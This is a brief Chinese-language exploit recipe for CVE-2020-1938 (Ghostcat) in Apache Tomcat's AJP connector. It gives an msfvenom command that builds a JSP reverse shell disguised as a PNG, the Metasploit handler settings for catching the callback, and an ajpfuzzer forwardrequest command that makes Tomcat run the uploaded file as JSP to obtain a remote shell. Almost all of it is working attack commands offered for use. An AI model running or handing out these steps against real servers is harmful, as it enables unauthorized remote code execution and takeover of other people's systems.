CVE-2020-1938(RCE利用)
1.使用msf生成反弹shell马,并且监听
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.223.129 LPORT=6666 R > shell.png
假设利用上传点,把此图片上传到了目标服务器/log/shell.png。
在msf监听:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.223.129
lhost => 192.168.223.129
msf exploit(multi/handler) > set lport 6666
lport => 6666
msf exploit(multi/handler) >exploit
2.发送AJP包,获取shell
使用AJP包构造工具来发送ajp包,以ajpfuzzer为例:
运行:java -jar ajpfuzzer_v0.6.jar
连接目标端口:connect 192.168.223.1 8009
执行以下命令:
forwardrequest 2 "HTTP/1.1" "/123.jsp" 192.168.223.1 192.168.223.1 porto 8009 false "Cookie:AAAA=BBBB","Accept-Encoding:identity" "javax.servlet.include.request_uri:/","javax.servlet.include.path_info:log/shell.png","javax.servlet.include.servlet_path:/"
可以看到,请求发送成功后,shell.png被作为jsp解析,成功获取目标服务器的shell。